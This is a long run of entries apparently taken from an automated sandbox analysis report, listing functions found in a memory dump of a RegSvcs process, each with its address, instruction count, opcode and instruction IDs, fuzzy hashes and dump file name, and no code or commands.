                                            • Instruction ID: 8080d9f2bcbd3224d5d2377e1f0bd0b8d35a26b2b74a2c1dece5bc20b6c58cc9
                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                            • Instruction Fuzzy Hash: E2217172A00609EBDF16CF58CA80A8EBBB5FF48714F148569EE15DB241D671EB06CB90
                                            Function 018944B0 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c232732f882940979fd3d0f340e911a4c2520cebb430bf50888fb2e7fa1d7142
                                            • Instruction ID: 8d7b3f8e690e64964280b35df13d382cd63f397b279f6afda86fe091e91eaac6
                                            • Opcode Fuzzy Hash: c232732f882940979fd3d0f340e911a4c2520cebb430bf50888fb2e7fa1d7142
                                            • Instruction Fuzzy Hash: C721C3726047459FCB22DF58C980B6BB7E5FB88760F044529FD54DB641D730EE018BA2
                                            Function 0185E388 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                            • Instruction ID: eef04ad63bf6fcc71e8fc2dcaf0cec951055a6c452f35b420233876a50c6852c
                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                            • Instruction Fuzzy Hash: 8E318A31600608EFD721CB68C884F6ABBF9EF85358F1045A9E952CB291E730EF42CB51
                                            Function 018DE609 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df459e8ac5a235b1f99c7fa85a82ccd50aeb9cac429824db3825dbf76977bfc9
                                            • Instruction ID: 7398560fdb43cd02ad39ec5521089c84c38d3f9181645ae0e5b94a156b4243e6
                                            • Opcode Fuzzy Hash: df459e8ac5a235b1f99c7fa85a82ccd50aeb9cac429824db3825dbf76977bfc9
                                            • Instruction Fuzzy Hash: 8231AE75A00209DFCB14DF1CD8849AEBBB5FF88714B158459E809EB391E731EA40CB91
                                            Function 018E06F1 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea2b9704f1fcb1b1f4af41ce562212d6f571ef81d4682b255a45a525629399b0
                                            • Instruction ID: 969e6103c791ee117ce7e2c5d91d1cf2bdaf65144bf8f6a0a0b88dbc4e3b8d28
                                            • Opcode Fuzzy Hash: ea2b9704f1fcb1b1f4af41ce562212d6f571ef81d4682b255a45a525629399b0
                                            • Instruction Fuzzy Hash: D021A071A002299BCF10DF59C881ABEB7F4FF49740B440069F941F7240D778AE41CBA1
                                            Function 018E019F Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 850bfc85356541fca84aee6ab39695ea1cf4e234954b668aeca48c07780ffeaf
                                            • Instruction ID: b1a5945a3d8457f0a8c640222e95a86c35ef463cc46b8a1d94aa972480df5ec9
                                            • Opcode Fuzzy Hash: 850bfc85356541fca84aee6ab39695ea1cf4e234954b668aeca48c07780ffeaf
                                            • Instruction Fuzzy Hash: 9A21EC71600605AFD715DB6CC844F2AB7E8FF49740F140069F904EB6A1D738EE40CB69
                                            Function 018E0283 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2b94a4818421a12345eb68bf31c979c0b1b3cc784115a90c264ffc7d875ea25
                                            • Instruction ID: d0a76ff168cbcad68d87f95cb91ab57cfb33d43524fe3627a1ad2e71a83e76f2
                                            • Opcode Fuzzy Hash: b2b94a4818421a12345eb68bf31c979c0b1b3cc784115a90c264ffc7d875ea25
                                            • Instruction Fuzzy Hash: 2721D072A043469BD712EF5DC848B5BBBECAF92740F080856BD80C7251D774CB08C6A3
                                            Function 01882835 Relevance: .1, Instructions: 73COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 24ca023313db888d58b37f645655fcc6a04fb17e2af805a469a5ce85f0c1e6a4
                                            • Instruction ID: 618f74cda8550e70760c87c7c263f1b5077bdbad1766d8d112f36f93325be535
                                            • Opcode Fuzzy Hash: 24ca023313db888d58b37f645655fcc6a04fb17e2af805a469a5ce85f0c1e6a4
                                            • Instruction Fuzzy Hash: 5D210B317556899BE726676C8D04B243BD5AF41B74F180364FF20EB6D2EB7CCA41C242
                                            Function 0189A30B Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88101d22fbe5bbc00d1c53d9a309f271d194775be8aefb8aa398530b85d3667a
                                            • Instruction ID: 6c43060ea65bb45367366658a57a34e6b154de54e2c5bdf2035bc1a1d8b829bc
                                            • Opcode Fuzzy Hash: 88101d22fbe5bbc00d1c53d9a309f271d194775be8aefb8aa398530b85d3667a
                                            • Instruction Fuzzy Hash: CA218E752007019FCB29DF29CD01B56B7F5FF48B04F288468A509CBB61E371EA42DB95
                                            Function 0191A49A Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7ddf4beab5480d91db4dca6716ceced00bf94e4ed6050fa3471d8e99b1f1c48
                                            • Instruction ID: 2af92c0f1d76ea9c049e230b57ebd9f0e2b63f01039c17e848c12216d08b10f3
                                            • Opcode Fuzzy Hash: a7ddf4beab5480d91db4dca6716ceced00bf94e4ed6050fa3471d8e99b1f1c48
                                            • Instruction Fuzzy Hash: 9E112372385A19BBE32296589C00F2B769D9BD4B60F140428B71CCB2C8EB74DD008796
                                            Function 018E0946 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6fde2b0e57ef30b952dc0c5118db67ac4dffae3b3d31728a9792c52a7660b4b2
                                            • Instruction ID: ca3c2a12bbe8966f284d4400b08e2099caf0a5c8a5617f225d99a58e25517ceb
                                            • Opcode Fuzzy Hash: 6fde2b0e57ef30b952dc0c5118db67ac4dffae3b3d31728a9792c52a7660b4b2
                                            • Instruction Fuzzy Hash: A621D6B1E00309ABDB10DFAAD8859AEFBF9FF98700F10012EE505E7241D7749A45CB55
                                            Function 018F80A8 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                            • Instruction ID: 6d8e143250d9e196648487a281b32b760e97f915e4b3c33bce756cdf6e594d8f
                                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                            • Instruction Fuzzy Hash: FD218172A00209EFDF129F58CC40B9EBBB9EF85310F204419FA00E7251D734DA50DB50
                                            Function 01890124 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                            • Instruction ID: 05df8d7511deaf3ed6726f0eef8944df2e63fd0776f3c0d3bf8fe0b1350f1102
                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                            • Instruction Fuzzy Hash: 0511D0B2600A15AFEB229A48CC41F9ABBBCEF80B54F180429F600CB180D671EE44CB55
                                            Function 01868770 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a84fdb0e18f3a160a1730a157102becaf40900a06aa07ece98536dbc3fe48827
                                            • Instruction ID: dcaed0cff64357bf68d7a468366fc67fc77f4cbaba18965c8bbb52304c34c39e
                                            • Opcode Fuzzy Hash: a84fdb0e18f3a160a1730a157102becaf40900a06aa07ece98536dbc3fe48827
                                            • Instruction Fuzzy Hash: 7A119D717007159B9B11CF4EC580A26BBEDAF8B750B188069EE0CDF204D6B2DA018790
                                            Function 0189AAEE Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                            • Instruction ID: 107c3b3cce41045a02fb865787f315f2965c2bde02e69dbe1c47b8d486611bbe
                                            • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                            • Instruction Fuzzy Hash: 6F217772640645DFDB299F4DC540A66BBE6FB94B14F18883DE94ACBA10C731EE01CB80
                                            Function 018680E9 Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c01122b8246d69b4fe7d9e300b573adbcfe4db28b61ec031a2f0ea0f3157c85d
                                            • Instruction ID: bc70fd34566d9ed3d3f040d4a0ecb0f0ce8707011d6446751dd3d82a5d22e6c1
                                            • Opcode Fuzzy Hash: c01122b8246d69b4fe7d9e300b573adbcfe4db28b61ec031a2f0ea0f3157c85d
                                            • Instruction Fuzzy Hash: 66216F75A00609DFCB14CF58C581A6EBBB9FB89718F24416DD109AB311D771AE06CBD0
                                            Function 0189674D Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44964fbe85371938cf351edcc4efc795d081929c94a70d9747e8c56cfa65e6c1
                                            • Instruction ID: b1729f4ed159d839ba570d1f706624c6bc8c29228feb9d8da914a128bdf08b10
                                            • Opcode Fuzzy Hash: 44964fbe85371938cf351edcc4efc795d081929c94a70d9747e8c56cfa65e6c1
                                            • Instruction Fuzzy Hash: 56219071600B00EFDB20CF68C880F66B7F8FF44354F58892DE59AD7250EA30AA40CB61
                                            Function 0188E8C0 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 552508b3065500872a45d8cc62bbd363682af7ec4ad2cfd7bc9860f3172d29a8
                                            • Instruction ID: 04cd1614d5823839224dfa92987cc3c6909fda47de81f9191cb6b02381fc617f
                                            • Opcode Fuzzy Hash: 552508b3065500872a45d8cc62bbd363682af7ec4ad2cfd7bc9860f3172d29a8
                                            • Instruction Fuzzy Hash: 82116B333002149FCF19DB28CC80A2BB2A7EFD1774B24452CEA26CB280E930DA02C791
                                            Function 018F6870 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 225e4af028dd980449a50759c71e76383bc4a587d8fa9457667441c50c095da6
                                            • Instruction ID: 12c9583a5e9cb8bbab0843a0e312252994f07797677776f0f6d1408a6afed30c
                                            • Opcode Fuzzy Hash: 225e4af028dd980449a50759c71e76383bc4a587d8fa9457667441c50c095da6
                                            • Instruction Fuzzy Hash: 89119132340614FBD722DB6DC940F9A77A8EB95B54F21412DF705DB262EA70EA01C7A1
                                            Function 018966B0 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e28403b92f03fc7903d63171d6b2a388cc09aa36057897bf3e9101bf8880bd1e
                                            • Instruction ID: 0c7c63baf0fbcee684eb5eff1142ed476dc14ec758de6f972a022841a54dc576
                                            • Opcode Fuzzy Hash: e28403b92f03fc7903d63171d6b2a388cc09aa36057897bf3e9101bf8880bd1e
                                            • Instruction Fuzzy Hash: 17118C76A01205ABCF25DF59D580E5ABBE9EB94750B2A8179E905EB311F630DE00CB90
                                            Function 0192A8E4 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                            • Instruction ID: 40f8747a1b92595415292ab40a88e22ceff7eee1d9f90962b5001cf5e477d4d4
                                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                            • Instruction Fuzzy Hash: 2C11B236A00929AFDB19CB58CC05A9DBBF5EF84210F058269E859A7344E675AE51CB80
                                            Function 01860AD0 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                            • Instruction ID: 97260d16db394383ebb0b5181e42e90d69e360f775717b2bb619ca53d039aca2
                                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                            • Instruction Fuzzy Hash: 2B2106B5A40B059FD3A0CF29C440B52BBF4FB48B10F10892EE98AC7B40E371E914CB94
                                            Function 018EE7E1 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                            • Instruction ID: 75d6318a55cb1f168210e15d405647aca94602c7a5ac028753064dacd14bab51
                                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                            • Instruction Fuzzy Hash: 31110232A00619EFE7209F48C848B16BBE5EF42754F058428EA18DB160EB30DE44DB90
                                            Function 018827ED Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 25418be7af739f682bb71e3db3ccfceda203818fa100f6faa38349fbe1ab8222
                                            • Instruction ID: 16faa93316ecf1dbca42332b12967bd8d7d187189e82b285e6f7111a0476a7cd
                                            • Opcode Fuzzy Hash: 25418be7af739f682bb71e3db3ccfceda203818fa100f6faa38349fbe1ab8222
                                            • Instruction Fuzzy Hash: 5D014971705649AFE72AA26DDC84F277B9DEF80795F050078FA00DB241EA28DE00C2B2
                                            Function 01864690 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e87c382a8a277b23f59ee9c5343a265f08ab293f7642ee2862f315fa986493a
                                            • Instruction ID: 1b38008b09da50240a9b2dcc5cac163c925cb699a32c740f2c4973fd1f290130
                                            • Opcode Fuzzy Hash: 0e87c382a8a277b23f59ee9c5343a265f08ab293f7642ee2862f315fa986493a
                                            • Instruction Fuzzy Hash: 6D110E76200648AFDB21CF5DC880F1A7BACEB96B68F084119F904CB251C378EA40CFA0
                                            Function 01934B00 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 893693d3adebfe2f92cbc1a56387cb8e6296f6d32aec32b1606eba390f51fc03
                                            • Instruction ID: 4ac920e74284088ad3f6bd8e34bfdfdf4de333554daf0797eebaf9856bfd2a89
                                            • Opcode Fuzzy Hash: 893693d3adebfe2f92cbc1a56387cb8e6296f6d32aec32b1606eba390f51fc03
                                            • Instruction Fuzzy Hash: 2F11C6362006119FD7259A6DD840F5BBBBAFFC4711F164529EA4AC7790DB34E802C791
                                            Function 01896620 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59bb9044e6d10c1e10dafce9935afb052b565a4c20cc5a09f392019a5483eed2
                                            • Instruction ID: 28119a8ee706363c916a45db5f1c8ec3caba470f25ef73dc40793e998b47144e
                                            • Opcode Fuzzy Hash: 59bb9044e6d10c1e10dafce9935afb052b565a4c20cc5a09f392019a5483eed2
                                            • Instruction Fuzzy Hash: D7118272A00715ABEB22DF6DC980B5EFBB8EF84750F690459DA05E7200E730AE019B91
                                            Function 0188EA2E Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e1e2a64bb05e5fddf4093af8740132d75164e4cb544bcecd8481969711dd115
                                            • Instruction ID: 112dce83de1b8c17da7f6a33affd383cd3579795733e787f1fd4f97b0d7a27d7
                                            • Opcode Fuzzy Hash: 9e1e2a64bb05e5fddf4093af8740132d75164e4cb544bcecd8481969711dd115
                                            • Instruction Fuzzy Hash: E501F5715042059FE325EF18E404F26FBF9FB91714F25816AE104DB261D770ED42CB90
                                            Function 0188E53E Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                            • Instruction ID: 6fbdb6fcf7c4d083a92293732d1a69da8626341c00d91de4e49d1efa5ccb09ca
                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                            • Instruction Fuzzy Hash: 8411E5712016C69BFB23A72CC954B657B95EB01B4CF1900A4EF41D7652F338CA42C262
                                            Function 018EE75D Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                            • Instruction ID: af34449d39788463a61b9ade63d82b595a6e20c44425e0fa985935c5a2e028d2
                                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                            • Instruction Fuzzy Hash: 33019232640105BFE7219F5CCC48F5A7AE9EB46B54F098424EA45DB260E775DF40C790
                                            Function 0185A250 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                            • Instruction ID: 9aac7643237fbe68e623bda06a781f27690ce036a73f999a9b88be008fbc2ce8
                                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                            • Instruction Fuzzy Hash: FC012632404725AFCB758F19E881A327FA5EF55BA07008A2DFC95CB281C331D600CB60
                                            Function 01934940 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6fd87a9fbd125547631ab12f8a5dec58bff5ba29b5fa5f5c8f9c701909b84a82
                                            • Instruction ID: 42a70a4cae51c58a835d94f7cfceb739f684df1e914da828c8a62df8a10c2f09
                                            • Opcode Fuzzy Hash: 6fd87a9fbd125547631ab12f8a5dec58bff5ba29b5fa5f5c8f9c701909b84a82
                                            • Instruction Fuzzy Hash: 3101D2725416019FC332DF1CD840E12BBACEBD1B71B264265E9AC9B1A6E730D901CBD1
                                            Function 018DE1D0 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a99ae86efd0e7ddf4b23c312001cd2eadb16703783ed9c144e5bb0aeb8dc96df
                                            • Instruction ID: 8d2d56bb7904556133e8fe883f82c53802dd74e3bdfcc47652240c27d82fe020
                                            • Opcode Fuzzy Hash: a99ae86efd0e7ddf4b23c312001cd2eadb16703783ed9c144e5bb0aeb8dc96df
                                            • Instruction Fuzzy Hash: E2117932241241EFDB15EF19C990F16BBB8FB94B84F2000A9FA05DB661D635EA01CA91
                                            Function 01866259 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 042efdc512a94d58446aa2bbac7650e39037230de3802692ebfb3e7e4f7d7e0f
                                            • Instruction ID: ed7dabdd62354b34676f928441aac957ec5c1fd6005a678ab1eb37824bf1e62e
                                            • Opcode Fuzzy Hash: 042efdc512a94d58446aa2bbac7650e39037230de3802692ebfb3e7e4f7d7e0f
                                            • Instruction Fuzzy Hash: 11115E71541219ABEB35AB68CC41FE9B379AB04710F9041D4A314E61E0D7709F81CF85
